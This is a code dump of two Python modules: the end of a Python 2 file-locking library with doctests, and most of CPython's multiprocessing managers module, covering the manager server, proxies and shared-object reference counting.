... except LockTimeout:
... lock2.break_lock()
... lock2.is_locked()
... lock1.is_locked()
... lock2.acquire()
... else:
... print 'expected LockTimeout...'
...
False
False
>>> lock1.i_am_locking()
False
>>> lock2.i_am_locking()
True
>>> lock2.release()
"""
pass
def break_lock(self):
"""Remove a lock. Useful if a locking thread failed to unlock.
>>> lock = FileLock(_testfile())
>>> lock.acquire()
>>> lock2 = FileLock(_testfile())
>>> lock2.is_locked()
True
>>> lock2.break_lock()
>>> lock2.is_locked()
False
>>> try:
... lock.release()
... except NotLocked:
... pass
... except Exception, e:
... print 'unexpected exception', repr(e)
... else:
... print 'break lock failed'
"""
pass
def __enter__(self):
"""Context manager support.
>>> lock = FileLock(_testfile())
>>> with lock:
... lock.is_locked()
...
True
>>> lock.is_locked()
False
"""
self.acquire()
return self
def __exit__(self, *_exc):
"""Context manager support.
>>> 'tested in __enter__'
'tested in __enter__'
"""
self.release()
class LinkFileLock(LockBase):
"""Lock access to a file using atomic property of link(2)."""
def acquire(self, timeout=None):
"""
>>> d = _testfile()
>>> os.mkdir(d)
>>> os.chmod(d, 0444)
>>> try:
... lock = LinkFileLock(os.path.join(d, 'test'))
... try:
... lock.acquire()
... except LockFailed:
... pass
... else:
... lock.release()
... print 'erroneously locked', os.path.join(d, 'test')
... finally:
... os.chmod(d, 0664)
... os.rmdir(d)
"""
try:
open(self.unique_name, "wb").close()
except IOError:
raise LockFailed
end_time = time.time()
if timeout is not None and timeout > 0:
end_time += timeout
while True:
# Try and create a hard link to it.
try:
os.link(self.unique_name, self.lock_file)
except OSError:
# Link creation failed. Maybe we've double-locked?
nlinks = os.stat(self.unique_name).st_nlink
if nlinks == 2:
# The original link plus the one I created == 2. We're
# good to go.
return
else:
# Otherwise the lock creation failed.
if timeout is not None and time.time() > end_time:
os.unlink(self.unique_name)
if timeout > 0:
raise LockTimeout
else:
raise AlreadyLocked
time.sleep(timeout is not None and timeout/10 or 0.1)
else:
# Link creation succeeded. We're good to go.
return
def release(self):
if not self.is_locked():
raise NotLocked
elif not os.path.exists(self.unique_name):
raise NotMyLock
os.unlink(self.unique_name)
os.unlink(self.lock_file)
def is_locked(self):
return os.path.exists(self.lock_file)
def i_am_locking(self):
return (self.is_locked() and
os.path.exists(self.unique_name) and
os.stat(self.unique_name).st_nlink == 2)
def break_lock(self):
if os.path.exists(self.lock_file):
os.unlink(self.lock_file)
class MkdirFileLock(LockBase):
"""Lock file by creating a directory."""
def __init__(self, path, threaded=True):
"""
>>> lock = MkdirFileLock(_testfile())
"""
LockBase.__init__(self, path)
if threaded:
tname = "%x-" % thread.get_ident()
else:
tname = ""
# Lock file itself is a directory. Place the unique file name into
# it.
self.unique_name = os.path.join(self.lock_file,
"%s.%s%s" % (self.hostname,
tname,
self.pid))
def acquire(self, timeout=None):
end_time = time.time()
if timeout is not None and timeout > 0:
end_time += timeout
if timeout is None:
wait = 0.1
else:
wait = max(0, timeout / 10)
while True:
try:
os.mkdir(self.lock_file)
except OSError, err:
if err.errno == errno.EEXIST:
# Already locked.
if os.path.exists(self.unique_name):
# Already locked by me.
return
if timeout is not None and time.time() > end_time:
if timeout > 0:
raise LockTimeout
else:
# Someone else has the lock.
raise AlreadyLocked
time.sleep(wait)
else:
# Couldn't create the lock for some other reason
raise LockFailed
else:
open(self.unique_name, "wb").close()
return
def release(self):
if not self.is_locked():
raise NotLocked
elif not os.path.exists(self.unique_name):
raise NotMyLock
os.unlink(self.unique_name)
os.rmdir(self.lock_file)
def is_locked(self):
return os.path.exists(self.lock_file)
def i_am_locking(self):
return (self.is_locked() and
os.path.exists(self.unique_name))
def break_lock(self):
if os.path.exists(self.lock_file):
for name in os.listdir(self.lock_file):
os.unlink(os.path.join(self.lock_file, name))
os.rmdir(self.lock_file)
class SQLiteFileLock(LockBase):
"Demonstration of using same SQL-based locking."
import tempfile
_fd, testdb = tempfile.mkstemp()
os.close(_fd)
os.unlink(testdb)
del _fd, tempfile
def __init__(self, path, threaded=True):
LockBase.__init__(self, path, threaded)
self.lock_file = unicode(self.lock_file)
self.unique_name = unicode(self.unique_name)
import sqlite3
self.connection = sqlite3.connect(SQLiteFileLock.testdb)
c = self.connection.cursor()
try:
c.execute("create table locks"
"("
" lock_file varchar(32),"
" unique_name varchar(32)"
")")
except sqlite3.OperationalError:
pass
else:
self.connection.commit()
import atexit
atexit.register(os.unlink, SQLiteFileLock.testdb)
def acquire(self, timeout=None):
end_time = time.time()
if timeout is not None and timeout > 0:
end_time += timeout
if timeout is None:
wait = 0.1
elif timeout <= 0:
wait = 0
else:
wait = timeout / 10
cursor = self.connection.cursor()
while True:
if not self.is_locked():
# Not locked. Try to lock it.
cursor.execute("insert into locks"
" (lock_file, unique_name)"
" values"
" (?, ?)",
(self.lock_file, self.unique_name))
self.connection.commit()
# Check to see if we are the only lock holder.
cursor.execute("select * from locks"
" where unique_name = ?",
(self.unique_name,))
rows = cursor.fetchall()
if len(rows) > 1:
# Nope. Someone else got there. Remove our lock.
cursor.execute("delete from locks"
" where unique_name = ?",
(self.unique_name,))
self.connection.commit()
else:
# Yup. We're done, so go home.
return
else:
# Check to see if we are the only lock holder.
cursor.execute("select * from locks"
" where unique_name = ?",
(self.unique_name,))
rows = cursor.fetchall()
if len(rows) == 1:
# We're the locker, so go home.
return
# Maybe we should wait a bit longer.
if timeout is not None and time.time() > end_time:
if timeout > 0:
# No more waiting.
raise LockTimeout
else:
# Someone else has the lock and we are impatient..
raise AlreadyLocked
# Well, okay. We'll give it a bit longer.
time.sleep(wait)
def release(self):
if not self.is_locked():
raise NotLocked
if not self.i_am_locking():
raise NotMyLock, ("locker:", self._who_is_locking(),
"me:", self.unique_name)
cursor = self.connection.cursor()
cursor.execute("delete from locks"
" where unique_name = ?",
(self.unique_name,))
self.connection.commit()
def _who_is_locking(self):
cursor = self.connection.cursor()
cursor.execute("select unique_name from locks"
" where lock_file = ?",
(self.lock_file,))
return cursor.fetchone()[0]
def is_locked(self):
cursor = self.connection.cursor()
cursor.execute("select * from locks"
" where lock_file = ?",
(self.lock_file,))
rows = cursor.fetchall()
return not not rows
def i_am_locking(self):
cursor = self.connection.cursor()
cursor.execute("select * from locks"
" where lock_file = ?"
" and unique_name = ?",
(self.lock_file, self.unique_name))
return not not cursor.fetchall()
def break_lock(self):
cursor = self.connection.cursor()
cursor.execute("delete from locks"
" where lock_file = ?",
(self.lock_file,))
self.connection.commit()
if hasattr(os, "link"):
FileLock = LinkFileLock
else:
FileLock = MkdirFileLock
def _in_thread(func, *args, **kwargs):
"""Execute func(*args, **kwargs) after dt seconds.
Helper for docttests.
"""
def _f():
func(*args, **kwargs)
t = threading.Thread(target=_f, name='/*/*')
t.start()
return t
def _testfile():
"""Return platform-appropriate lock file name.
Helper for doctests.
"""
import tempfile
return os.path.join(tempfile.gettempdir(), 'trash-%s' % os.getpid())
def _lock_wait_unlock(event1, event2):
"""Lock from another thread.
Helper for doctests.
"""
lock = FileLock(_testfile())
with lock:
event1.set() # we're in,
event2.wait() # wait for boss's permission to leave
def _test():
global FileLock
import doctest
import sys
def test_object(c):
nfailed = ntests = 0
for (obj, recurse) in ((c, True),
(LockBase, True),
(sys.modules["__main__"], False)):
tests = doctest.DocTestFinder(recurse=recurse).find(obj)
runner = doctest.DocTestRunner(verbose="-v" in sys.argv)
tests.sort(key = lambda test: test.name)
for test in tests:
f, t = runner.run(test)
nfailed += f
ntests += t
print FileLock.__name__, "tests:", ntests, "failed:", nfailed
return nfailed, ntests
nfailed = ntests = 0
if hasattr(os, "link"):
FileLock = LinkFileLock
f, t = test_object(FileLock)
nfailed += f
ntests += t
if hasattr(os, "mkdir"):
FileLock = MkdirFileLock
f, t = test_object(FileLock)
nfailed += f
ntests += t
try:
import sqlite3
except ImportError:
print "SQLite3 is unavailable - not testing SQLiteFileLock."
else:
print "Testing SQLiteFileLock with sqlite", sqlite3.sqlite_version,
print "& pysqlite", sqlite3.version
FileLock = SQLiteFileLock
f, t = test_object(FileLock)
nfailed += f
ntests += t
print "total tests:", ntests, "total failed:", nfailed
if __name__ == "__main__":
_test()
|
managers.py
|
#
# Module providing manager classes for dealing
# with shared objects
#
# multiprocessing/managers.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
__all__ = [ 'BaseManager', 'SyncManager', 'BaseProxy', 'Token' ]
#
# Imports
#
import sys
import threading
import signal
import array
import queue
import time
import types
import os
from os import getpid
from traceback import format_exc
from . import connection
from .context import reduction, get_spawning_popen, ProcessError
from . import pool
from . import process
from . import util
from . import get_context
try:
from . import shared_memory
except ImportError:
HAS_SHMEM = False
else:
HAS_SHMEM = True
__all__.append('SharedMemoryManager')
#
# Register some things for pickling
#
def reduce_array(a):
return array.array, (a.typecode, a.tobytes())
reduction.register(array.array, reduce_array)
view_types = [type(getattr({}, name)()) for name in ('items','keys','values')]
def rebuild_as_list(obj):
return list, (list(obj),)
for view_type in view_types:
reduction.register(view_type, rebuild_as_list)
del view_type, view_types
#
# Type for identifying shared objects
#
class Token(object):
'''
Type to uniquely identify a shared object
'''
__slots__ = ('typeid', 'address', 'id')
def __init__(self, typeid, address, id):
(self.typeid, self.address, self.id) = (typeid, address, id)
def __getstate__(self):
return (self.typeid, self.address, self.id)
def __setstate__(self, state):
(self.typeid, self.address, self.id) = state
def __repr__(self):
return '%s(typeid=%r, address=%r, id=%r)' % \
(self.__class__.__name__, self.typeid, self.address, self.id)
#
# Function for communication with a manager's server process
#
def dispatch(c, id, methodname, args=(), kwds={}):
'''
Send a message to manager using connection `c` and return response
'''
c.send((id, methodname, args, kwds))
kind, result = c.recv()
if kind == '#RETURN':
return result
raise convert_to_error(kind, result)
def convert_to_error(kind, result):
if kind == '#ERROR':
return result
elif kind in ('#TRACEBACK', '#UNSERIALIZABLE'):
if not isinstance(result, str):
raise TypeError(
"Result {0!r} (kind '{1}') type is {2}, not str".format(
result, kind, type(result)))
if kind == '#UNSERIALIZABLE':
return RemoteError('Unserializable message: %s\n' % result)
else:
return RemoteError(result)
else:
return ValueError('Unrecognized message type {!r}'.format(kind))
class RemoteError(Exception):
def __str__(self):
return ('\n' + '-'*75 + '\n' + str(self.args[0]) + '-'*75)
#
# Functions for finding the method names of an object
#
def all_methods(obj):
'''
Return a list of names of methods of `obj`
'''
temp = []
for name in dir(obj):
func = getattr(obj, name)
if callable(func):
temp.append(name)
return temp
def public_methods(obj):
'''
Return a list of names of methods of `obj` which do not start with '_'
'''
return [name for name in all_methods(obj) if name[0] != '_']
#
# Server which is run in a process controlled by a manager
#
class Server(object):
'''
Server class which runs in a process controlled by a manager object
'''
public = ['shutdown', 'create', 'accept_connection', 'get_methods',
'debug_info', 'number_of_objects', 'dummy', 'incref', 'decref']
def __init__(self, registry, address, authkey, serializer):
if not isinstance(authkey, bytes):
raise TypeError(
"Authkey {0!r} is type {1!s}, not bytes".format(
authkey, type(authkey)))
self.registry = registry
self.authkey = process.AuthenticationString(authkey)
Listener, Client = listener_client[serializer]
# do authentication later
self.listener = Listener(address=address, backlog=16)
self.address = self.listener.address
self.id_to_obj = {'0': (None, ())}
self.id_to_refcount = {}
self.id_to_local_proxy_obj = {}
self.mutex = threading.Lock()
def serve_forever(self):
'''
Run the server forever
'''
self.stop_event = threading.Event()
process.current_process()._manager_server = self
try:
accepter = threading.Thread(target=self.accepter)
accepter.daemon = True
accepter.start()
try:
while not self.stop_event.is_set():
self.stop_event.wait(1)
except (KeyboardInterrupt, SystemExit):
pass
finally:
if sys.stdout != sys.__stdout__: # what about stderr?
util.debug('resetting stdout, stderr')
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
sys.exit(0)
def accepter(self):
while True:
try:
c = self.listener.accept()
except OSError:
continue
t = threading.Thread(target=self.handle_request, args=(c,))
t.daemon = True
t.start()
def _handle_request(self, c):
request = None
try:
connection.deliver_challenge(c, self.authkey)
connection.answer_challenge(c, self.authkey)
request = c.recv()
ignore, funcname, args, kwds = request
assert funcname in self.public, '%r unrecognized' % funcname
func = getattr(self, funcname)
except Exception:
msg = ('#TRACEBACK', format_exc())
else:
try:
result = func(c, *args, **kwds)
except Exception:
msg = ('#TRACEBACK', format_exc())
else:
msg = ('#RETURN', result)
try:
c.send(msg)
except Exception as e:
try:
c.send(('#TRACEBACK', format_exc()))
except Exception:
pass
util.info('Failure to send message: %r', msg)
util.info(' ... request was %r', request)
util.info(' ... exception was %r', e)
def handle_request(self, conn):
'''
Handle a new connection
'''
try:
self._handle_request(conn)
except SystemExit:
# Server.serve_client() calls sys.exit(0) on EOF
pass
finally:
conn.close()
def serve_client(self, conn):
'''
Handle requests from the proxies in a particular process/thread
'''
util.debug('starting server thread to service %r',
threading.current_thread().name)
recv = conn.recv
send = conn.send
id_to_obj = self.id_to_obj
while not self.stop_event.is_set():
try:
methodname = obj = None
request = recv()
ident, methodname, args, kwds = request
try:
obj, exposed, gettypeid = id_to_obj[ident]
except KeyError as ke:
try:
obj, exposed, gettypeid = \
self.id_to_local_proxy_obj[ident]
except KeyError:
raise ke
if methodname not in exposed:
raise AttributeError(
'method %r of %r object is not in exposed=%r' %
(methodname, type(obj), exposed)
)
function = getattr(obj, methodname)
try:
res = function(*args, **kwds)
except Exception as e:
msg = ('#ERROR', e)
else:
typeid = gettypeid and gettypeid.get(methodname, None)
if typeid:
rident, rexposed = self.create(conn, typeid, res)
token = Token(typeid, self.address, rident)
msg = ('#PROXY', (rexposed, token))
else:
msg = ('#RETURN', res)
except AttributeError:
if methodname is None:
msg = ('#TRACEBACK', format_exc())
else:
try:
fallback_func = self.fallback_mapping[methodname]
result = fallback_func(
self, conn, ident, obj, *args, **kwds
)
msg = ('#RETURN', result)
except Exception:
msg = ('#TRACEBACK', format_exc())
except EOFError:
util.debug('got EOF -- exiting thread serving %r',
threading.current_thread().name)
sys.exit(0)
except Exception:
msg = ('#TRACEBACK', format_exc())
try:
try:
send(msg)
except Exception:
send(('#UNSERIALIZABLE', format_exc()))
except Exception as e:
util.info('exception in thread serving %r',
threading.current_thread().name)
util.info(' ... message was %r', msg)
util.info(' ... exception was %r', e)
conn.close()
sys.exit(1)
def fallback_getvalue(self, conn, ident, obj):
return obj
def fallback_str(self, conn, ident, obj):
return str(obj)
def fallback_repr(self, conn, ident, obj):
return repr(obj)
fallback_mapping = {
'__str__':fallback_str,
'__repr__':fallback_repr,
'#GETVALUE':fallback_getvalue
}
def dummy(self, c):
pass
def debug_info(self, c):
'''
Return some info --- useful to spot problems with refcounting
'''
# Perhaps include debug info about 'c'?
with self.mutex:
result = []
keys = list(self.id_to_refcount.keys())
keys.sort()
for ident in keys:
if ident != '0':
result.append(' %s: refcount=%s\n %s' %
(ident, self.id_to_refcount[ident],
str(self.id_to_obj[ident][0])[:75]))
return '\n'.join(result)
def number_of_objects(self, c):
'''
Number of shared objects
'''
# Doesn't use (len(self.id_to_obj) - 1) as we shouldn't count ident='0'
return len(self.id_to_refcount)
def shutdown(self, c):
'''
Shutdown this process
'''
try:
util.debug('manager received shutdown message')
c.send(('#RETURN', None))
except:
import traceback
traceback.print_exc()
finally:
self.stop_event.set()
def create(self, c, typeid, /, *args, **kwds):
'''
Create a new shared object and return its id
'''
with self.mutex:
callable, exposed, method_to_typeid, proxytype = \
self.registry[typeid]
if callable is None:
if kwds or (len(args) != 1):
raise ValueError(
"Without callable, must have one non-keyword argument")
obj = args[0]
else:
obj = callable(*args, **kwds)
if exposed is None:
exposed = public_methods(obj)
if method_to_typeid is not None:
if not isinstance(method_to_typeid, dict):
raise TypeError(
"Method_to_typeid {0!r}: type {1!s}, not dict".format(
method_to_typeid, type(method_to_typeid)))
exposed = list(exposed) + list(method_to_typeid)
ident = '%x' % id(obj) # convert to string because xmlrpclib
# only has 32 bit signed integers
util.debug('%r callable returned object with id %r', typeid, ident)
self.id_to_obj[ident] = (obj, set(exposed), method_to_typeid)
if ident not in self.id_to_refcount:
self.id_to_refcount[ident] = 0
self.incref(c, ident)
return ident, tuple(exposed)
def get_methods(self, c, token):
'''
Return the methods of the shared object indicated by token
'''
return tuple(self.id_to_obj[token.id][1])
def accept_connection(self, c, name):
'''
Spawn a new thread to serve this connection
'''
threading.current_thread().name = name
c.send(('#RETURN', None))
self.serve_client(c)
def incref(self, c, ident):
with self.mutex:
try:
self.id_to_refcount[ident] += 1
except KeyError as ke:
# If no external references exist but an internal (to the
# manager) still does and a new external reference is created
# from it, restore the manager's tracking of it from the
# previously stashed internal ref.
if ident in self.id_to_local_proxy_obj:
self.id_to_refcount[ident] = 1
self.id_to_obj[ident] = \
self.id_to_local_proxy_obj[ident]
obj, exposed, gettypeid = self.id_to_obj[ident]
util.debug('Server re-enabled tracking & INCREF %r', ident)
else:
raise ke
def decref(self, c, ident):
if ident not in self.id_to_refcount and \
ident in self.id_to_local_proxy_obj:
util.debug('Server DECREF skipping %r', ident)
return
with self.mutex:
if self.id_to_refcount[ident] <= 0:
raise AssertionError(
"Id {0!s} ({1!r}) has refcount {2:n}, not 1+".format(
ident, self.id_to_obj[ident],
self.id_to_refcount[ident]))
self.id_to_refcount[ident] -= 1
if self.id_to_refcount[ident] == 0:
del self.id_to_refcount[ident]
if ident not in self.id_to_refcount:
# Two-step process in case the object turns out to contain other
# proxy objects (e.g. a managed list of managed lists).
# Otherwise, deleting self.id_to_obj[ident] would trigger the
# deleting of the stored value (another managed object) which would
# in turn attempt to acquire the mutex that is already held here.
self.id_to_obj[ident] = (None, (), None) # thread-safe
util.debug('disposing of obj with id %r', ident)
with self.mutex:
del self.id_to_obj[ident]
#
# Class to represent state of a manager
#
class State(object):
__slots__ = ['value']
INITIAL = 0
STARTED = 1
SHUTDOWN = 2
#
# Mapping from serializer name to Listener and Client types
#
listener_client = {
'pickle' : (connection.Listener, connection.Client),
'xmlrpclib' : (connection.XmlListener, connection.XmlClient)
}
#
# Definition of BaseManager
#
class BaseManager(object):
'''
Base class for managers
'''
_registry = {}
_Server = Server
def __init__(self, address=None, authkey=None, serializer='pickle',
ctx=None, *, shutdown_timeout=1.0):
if authkey is None:
authkey = process.current_process().authkey
self._address = address # XXX not final address if eg ('', 0)
self._authkey = process.AuthenticationString(authkey)
self._state = State()
self._state.value = State.INITIAL
self._serializer = serializer
self._Listener, self._Client = listener_client[serializer]
self._ctx = ctx or get_context()
self._shutdown_timeout = shutdown_timeout
def get_server(self):
'''
Return server object with serve_forever() method and address attribute
'''
if self._state.value != State.INITIAL:
if self._state.value == State.STARTED:
raise ProcessError("Already started server")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("Manager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
return Server(self._registry, self._address,
self._authkey, self._serializer)
def connect(self):
'''
Connect manager object to the server process
'''
Listener, Client = listener_client[self._serializer]
conn = Client(self._address, authkey=self._authkey)
dispatch(conn, None, 'dummy')
self._state.value = State.STARTED
def start(self, initializer=None, initargs=()):
'''
Spawn a server process for this manager object
'''
if self._state.value != State.INITIAL:
if self._state.value == State.STARTED:
raise ProcessError("Already started server")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("Manager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
if initializer is not None and not callable(initializer):
raise TypeError('initializer must be a callable')
# pipe over which we will retrieve address of server
reader, writer = connection.Pipe(duplex=False)
# spawn process which runs a server
self._process = self._ctx.Process(
target=type(self)._run_server,
args=(self._registry, self._address, self._authkey,
self._serializer, writer, initializer, initargs),
)
ident = ':'.join(str(i) for i in self._process._identity)
self._process.name = type(self).__name__ + '-' + ident
self._process.start()
# get address of server
writer.close()
self._address = reader.recv()
reader.close()
# register a finalizer
self._state.value = State.STARTED
self.shutdown = util.Finalize(
self, type(self)._finalize_manager,
args=(self._process, self._address, self._authkey, self._state,
self._Client, self._shutdown_timeout),
exitpriority=0
)
@classmethod
def _run_server(cls, registry, address, authkey, serializer, writer,
initializer=None, initargs=()):
'''
Create a server, report its address and run it
'''
# bpo-36368: protect server process from KeyboardInterrupt signals
signal.signal(signal.SIGINT, signal.SIG_IGN)
if initializer is not None:
initializer(*initargs)
# create server
server = cls._Server(registry, address, authkey, serializer)
# inform parent process of the server's address
writer.send(server.address)
writer.close()
# run the manager
util.info('manager serving at %r', server.address)
server.serve_forever()
def _create(self, typeid, /, *args, **kwds):
'''
Create a new shared object; return the token and exposed tuple
'''
assert self._state.value == State.STARTED, 'server not yet started'
conn = self._Client(self._address, authkey=self._authkey)
try:
id, exposed = dispatch(conn, None, 'create', (typeid,)+args, kwds)
finally:
conn.close()
return Token(typeid, self._address, id), exposed
def join(self, timeout=None):
'''
Join the manager process (if it has been spawned)
'''
if self._process is not None:
self._process.join(timeout)
if not self._process.is_alive():
self._process = None
def _debug_info(self):
'''
Return some info about the servers shared objects and connections
'''
conn = self._Client(self._address, authkey=self._authkey)
try:
return dispatch(conn, None, 'debug_info')
finally:
conn.close()
def _number_of_objects(self):
'''
Return the number of shared objects
'''
conn = self._Client(self._address, authkey=self._authkey)
try:
return dispatch(conn, None, 'number_of_objects')
finally:
conn.close()
def __enter__(self):
if self._state.value == State.INITIAL:
self.start()
if self._state.value != State.STARTED:
if self._state.value == State.INITIAL:
raise ProcessError("Unable to start server")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("Manager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.shutdown()
@staticmethod
def _finalize_manager(process, address, authkey, state, _Client,
shutdown_timeout):
'''
Shutdown the manager process; will be registered as a finalizer
'''
if process.is_alive():
util.info('sending shutdown message to manager')
try:
conn = _Client(address, authkey=authkey)
try:
dispatch(conn, None, 'shutdown')
finally:
conn.close()
except Exception:
pass
process.join(timeout=shutdown_timeout)
if process.is_alive():
util.info('manager still alive')
if hasattr(process, 'terminate'):
util.info('trying to `terminate()` manager process')
process.terminate()
process.join(timeout=shutdown_timeout)
if process.is_alive():
util.info('manager still alive after terminate')
process.kill()
process.join()
state.value = State.SHUTDOWN
try:
del BaseProxy._address_to_local[address]
except KeyError:
pass
@property
def address(self):
return self._address
@classmethod
def register(cls, typeid, callable=None, proxytype=None, exposed=None,
method_to_typeid=None, create_method=True):
'''
Register a typeid with the manager type
'''
if '_registry' not in cls.__dict__:
cls._registry = cls._registry.copy()
if proxytype is None:
proxytype = AutoProxy
exposed = exposed or getattr(proxytype, '_exposed_', None)
method_to_typeid = method_to_typeid or \
getattr(proxytype, '_method_to_typeid_', None)
if method_to_typeid:
for key, value in list(method_to_typeid.items()): # isinstance?
assert type(key) is str, '%r is not a string' % key
assert type(value) is str, '%r is not a string' % value
cls._registry[typeid] = (
callable, exposed, method_to_typeid, proxytype
)
if create_method:
def temp(self, /, *args, **kwds):
util.debug('requesting creation of a shared %r object', typeid)
token, exp = self._create(typeid, *args, **kwds)
proxy = proxytype(
token, self._serializer, manager=self,
authkey=self._authkey, exposed=exp
)
conn = self._Client(token.address, authkey=self._authkey)
dispatch(conn, None, 'decref', (token.id,))
return proxy
temp.__name__ = typeid
setattr(cls, typeid, temp)
#
# Subclass of set which get cleared after a fork
#
class ProcessLocalSet(set):
def __init__(self):
util.register_after_fork(self, lambda obj: obj.clear())
def __reduce__(self):
return type(self), ()
#
# Definition of BaseProxy
#
class BaseProxy(object):
'''
A base for proxies of shared objects
'''
_address_to_local = {}
_mutex = util.ForkAwareThreadLock()
def __init__(self, token, serializer, manager=None,
authkey=None, exposed=None, incref=True, manager_owned=False):
with BaseProxy._mutex:
tls_idset = BaseProxy._address_to_local.get(token.address, None)
if tls_idset is None:
tls_idset = util.ForkAwareLocal(), ProcessLocalSet()
BaseProxy._address_to_local[token.address] = tls_idset
# self._tls is used to record the connection used by this
# thread to communicate with the manager at token.address
self._tls = tls_idset[0]
# self._idset is used to record the identities of all shared
# objects for which the current process owns references and
# which are in the manager at token.address
self._idset = tls_idset[1]
self._token = token
self._id = self._token.id
self._manager = manager
self._serializer = serializer
self._Client = listener_client[serializer][1]
# Should be set to True only when a proxy object is being created
# on the manager server; primary use case: nested proxy objects.
# RebuildProxy detects when a proxy is being created on the manager
# and sets this value appropriately.
self._owned_by_manager = manager_owned
if authkey is not None:
self._authkey = process.AuthenticationString(authkey)
elif self._manager is not None:
self._authkey = self._manager._authkey
else:
self._authkey = process.current_process().authkey
if incref:
self._incref()
util.register_after_fork(self, BaseProxy._after_fork)
def _connect(self):
util.debug('making connection to manager')
name = process.current_process().name
if threading.current_thread().name != 'MainThread':
name += '|' + threading.current_thread().name
conn = self._Client(self._token.address, authkey=self._authkey)
dispatch(conn, None, 'accept_connection', (name,))
self._tls.connection = conn
def _callmethod(self, methodname, args=(), kwds={}):
'''
Try to call a method of the referent and return a copy of the result
'''
try:
conn = self._tls.connection
except AttributeError:
util.debug('thread %r does not own a connection',
threading.current_thread().name)
self._connect()
conn = self._tls.connection
conn.send((self._id, methodname, args, kwds))
kind, result = conn.recv()
if kind == '#RETURN':
return result
elif kind == '#PROXY':
exposed, token = result
proxytype = self._manager._registry[token.typeid][-1]
token.address = self._token.address
proxy = proxytype(
token, self._serializer, manager=self._manager,
authkey=self._authkey, exposed=exposed
)
conn = self._Client(token.address, authkey=self._authkey)
dispatch(conn, None, 'decref', (token.id,))
return proxy
raise convert_to_error(kind, result)
def _getvalue(self):
'''
Get a copy of the value of the referent
'''
return self._callmethod('#GETVALUE')
def _incref(self):
if self._owned_by_manager:
util.debug('owned_by_manager skipped INCREF of %r', self._token.id)
return
conn = self._Client(self._token.address, authkey=self._authkey)
dispatch(conn, None, 'incref', (self._id,))
util.debug('INCREF %r', self._token.id)
self._idset.add(self._id)
state = self._manager and self._manager._state
self._close = util.Finalize(
self, BaseProxy._decref,
args=(self._token, self._authkey, state,
self._tls, self._idset, self._Client),
exitpriority=10
)
@staticmethod
def _decref(token, authkey, state, tls, idset, _Client):
idset.discard(token.id)
# check whether manager is still alive
if state is None or state.value == State.STARTED:
# tell manager this process no longer cares about referent
try:
util.debug('DECREF %r', token.id)
conn = _Client(token.address, authkey=authkey)
dispatch(conn, None, 'decref', (token.id,))
except Exception as e:
util.debug('... decref failed %s', e)
else:
util.debug('DECREF %r -- manager already shutdown', token.id)
# check whether we can close this thread's connection because
# the process owns no more references to objects for this manager
if not idset and hasattr(tls, 'connection'):
util.debug('thread %r has no more proxies so closing conn',
threading.current_thread().name)
tls.connection.close()
del tls.connection
def _after_fork(self):
self._manager = None
try:
self._incref()
except Exception as e:
# the proxy may just be for a manager which has shutdown
util.info('incref failed: %s' % e)
def __reduce__(self):
kwds = {}
if get_spawning_popen() is not None:
kwds['authkey'] = self._authkey
if getattr(self, '_isauto', False):
kwds['exposed'] = self._exposed_
return (RebuildProxy,
(AutoProxy, self._token, self._serializer, kwds))
else:
return (RebuildProxy,
(type(self), self._token, self._serializer, kwds))
def __deepcopy__(self, memo):
return self._getvalue()
def __repr__(self):
return '<%s object, typeid %r at %#x>' % \
(type(self).__name__, self._token.typeid, id(self))
def __str__(self):
'''
Return representation of the referent (or a fall-back if that fails)
'''
try:
return self._callmethod('__repr__')
except Exception:
return repr(self)[:-1] + "; '__str__()' failed>"
#
# Function used for unpickling
#
def RebuildProxy(func, token, serializer, kwds):
'''
Function used for unpickling proxy objects.
'''
server = getattr(process.current_process(), '_manager_server', None)
if server and server.address == token.address:
util.debug('Rebuild a proxy owned by manager, token=%r', token)
kwds['manager_owned'] = True
if token.id not in server.id_to_local_proxy_obj:
server.id_to_local_proxy_obj[token.id] = \
server.id_to_obj[token.id]
incref = (
kwds.pop('incref', True) and
not getattr(process.current_process(), '_inheriting', False)
)
return func(token, serializer, incref=incref, **kwds)
#
# Functions to create proxies and proxy types
#
def MakeProxyType(name, exposed, _cache={}):
'''
Return a proxy type whose methods are given by `exposed`
'''
exposed = tuple(exposed)
try:
return _cache[(name, exposed)]
except KeyError:
pass
dic = {}
for meth in exposed:
exec('''def %s(self, /, *args, **kwds):
return self._callmethod(%r, args, kwds)''' % (meth, meth), dic)
ProxyType = type(name, (BaseProxy,), dic)
ProxyType._exposed_ = exposed
_cache[(name, exposed)] = ProxyType
return ProxyType
def AutoProxy(token, serializer, manager=None, authkey=None,
exposed=None, incref=True, manager_owned=False):
'''
Return an auto-proxy for `token`
'''
_Client = listener_client[serializer][1]
if exposed is None:
conn = _Client(token.address, authkey=authkey)
try:
exposed = dispatch(conn, None, 'get_methods', (token,))
finally:
conn.close()
if authkey is None and manager is not None:
authkey = manager._authkey
if authkey is None:
authkey = process.current_process().authkey
ProxyType = MakeProxyType('AutoProxy[%s]' % token.typeid, exposed)
proxy = ProxyType(token, serializer, manager=manager, authkey=authkey,
incref=incref, manager_owned=manager_owned)
proxy._isauto = True
return proxy
#
# Types/callables which we will register with SyncManager
#
class Namespace(object):
def __init__(self, /, **kwds):
self.__dict__.update(kwds)
def __repr__(self):
items = list(self.__dict__.items())
temp = []
for name, value in items:
if not name.startswith('_'):
temp.append('%s=%r' % (name, value))
temp.sort()
return '%s(%s)' % (self.__class__.__name__, ', '.join(temp))
class Value(object):
def __init__(self, typecode, value, lock=True):
self._typecode = typecode
self._value = value
def get(self):
return self._value
def set(self, value):
self._value = value
def __repr__(self):
return '%s(%r, %r)'%(type(self).__name__, self._typecode, self._value)
value = property(get, set)
def Array(typecode, sequence, lock=True):
return array.array(typecode, sequence)
#
# Proxy types used by SyncManager
#
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__', 'send', 'throw', 'close')
def __iter__(self):
return self
def __next__(self, *args):
return self._callmethod('__next__', args)
def send(self, *args):
return self._callmethod('send', args)
def throw(self, *args):
return self._callmethod('throw', args)
def close(self, *args):
return self._callmethod('close', args)
class AcquirerProxy(BaseProxy):
_exposed_ = ('acquire', 'release')
